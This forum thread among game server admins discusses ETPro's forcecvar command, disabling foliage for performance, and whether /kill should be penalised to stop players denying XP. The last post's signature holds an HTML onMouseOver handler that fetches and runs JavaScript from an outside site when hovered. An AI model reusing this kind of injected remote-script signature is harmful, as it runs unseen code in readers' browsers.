forcecvar and radar example

Discussion for Admins of ETPro/BayonET servers.
If you don't run a server, please don't post here...

Moderators: Forum moderators, developers

O2.iceman

forcecvar and radar example

Post by O2.iceman »

Hullo

I was under the impression that the r_drawfoliage cvar was cheat-protected, meaning that clients couldn't turn off the grass on radar.

In your doco, you give the example that you could "forcecvar r_drawfoliage 0" to remove the foliage!?

Am I missing something?

Apparently on some ATI cards the foliage isn't drawn whatever value you have.

Thanks for feedback.
O2.iceman
Oxygen
bani
Site Admin

Post by bani »

the server can force many client cvars. cheat protected means you cant change it from the user interface (commandline or cfg's). the server can force it through some magic though.

of course, the clients can change a cvar back if they could normally change the cvar. eg you can force players cg_complaintpopup to 0, but "smart noobs" can turn it back on again :lol:

but for cheat protected cvars, the client has no choice but to use what the server forces them to. so this works well for r_drawfoliage.

and it does work. try it.

btw for r_drawfoliage you really need it set to 0 on the server before clients load, otherwise they wont get the full benefit. you can turn it to 0 mid-game but the client rendering engines have already loaded the base foliage models so you get some reduction but not as much as if if was set to 0 before they connected. if its 0 before they connect, the engine doesnt even load the models at all.

i get about 50% better fps with r_drawfoliage 0 on my gf4 440mx.
soyarma

Post by soyarma »

I'm trying to use this setting to bind a client key to /kill to stop people from killing themselves and denying their attacker the xp for the kill. I'm trying to force it to - as thats probably not what they have it set to themselves.

I've tried forcecvar bind "- kill" and a few other variations, but I can't seem to get it to work. Is it just me or is this not doable?
Michael Cooper
www.ilangame.com
et.ilserv.net
bani
Site Admin

Post by bani »

the server cant create new keybinds so what youre trying to do isnt doable.

/kill nerfing will be an option soon though.
GldDrgn

Post by GldDrgn »

sounds like a bad idea tbh, can you elaborate?
#rtcwduels - 1v1 à volonté
gotenks

Post by gotenks »

the /kill can be used to avoid giving enemy xp... i personally have never seen it done but have heard of it. The player that's loosing a gun battle /kill's himself so that the enemy doesn't kill him.
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
=FF=im2good4u

Post by =FF=im2good4u »

i ahve never seen it 2 it is posable indeed but why stop the enenmy from getting XP caz there are so much teammates that dont use it so the few p he will get for your kill will be useless to use /kill for :grenade:
gotenks

Post by gotenks »

:shock: ok i think i understood most of that... quick translation
I have never seen it either. It is possible indeed but why stop the enemy from getting XP. There are so many people that don't use the /kill to avoid it so because of the few that do it will be useless to use /kill for the ones that use it responsibly.
um the last line totally confused me but that was my best guess :shock: :lol: :?
My Website
=FF=im2good4u

Post by =FF=im2good4u »

thanx i saw the post came out a bit unreadable but you did great whit your translation.

so here is the selution :!:

make it that if some1 uses /kill that the xp will go to player who last hit him

so ..

if i shoot gotenks and he does /kill i still get the xp for shooting him
GldDrgn

Post by GldDrgn »

that sounds reasonable
#rtcwduels - 1v1 à volonté
^1 Kyle Katarn

Post by ^1 Kyle Katarn »

Sounds like teammates can take advantage of this and stay in spawn getting XP to come out as super soliders.
You ask me to show you God. I'll show you the written word.
gotenks

Post by gotenks »

ok it didn't get my msg i typed... i'll try again
i don't think the /kill should be penalized... if it does i kinda like the idea of spawning with the amount of health you had when you /killed, or put a timer on it... eg a 2 second delay... that'd prevent the the gun fight leaving... i personally don't like either for the competition mod because most clan battles are mature enough not to use it.
My Website
CorpseGrinder

Post by CorpseGrinder »

gotenks wrote:the /kill can be used to avoid giving enemy xp... i personally have never seen it done but have heard of it. The player that's loosing a gun battle /kill's himself so that the enemy doesn't kill him.
In wolf Death used to do it all the time. Just as you have him cornered and down to almost nothing, he'd /kill so you wouldn't get the credit for it. I think there should be a penalty for /kill, it is a mild cheat form in my opinion. Players use it basically to get a quick spawn health regeneration or to change classes in a hurry. It has also been used for giving yourself spawn protection so you can launch yourself over the wall with an air strike. It is only used to circumvent the sequential aspects of the game and I think there should be a penalty.
I am a loser that can't handle commitment.
suba

Post by suba »

turning off foliage didn't seem to work thru rcon, should it?

http://suba.customer.netspace.net.au/shot0000.jpg

note, I turned it off then did a restart of ET.
Rain

Post by Rain »

suba wrote:turning off foliage didn't seem to work thru rcon, should it?
It should work, but if you do a forcecvar on a variable for the first time, it won't be sent to clients until the map on the server is reloaded (either via map_restart or a map change.)
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>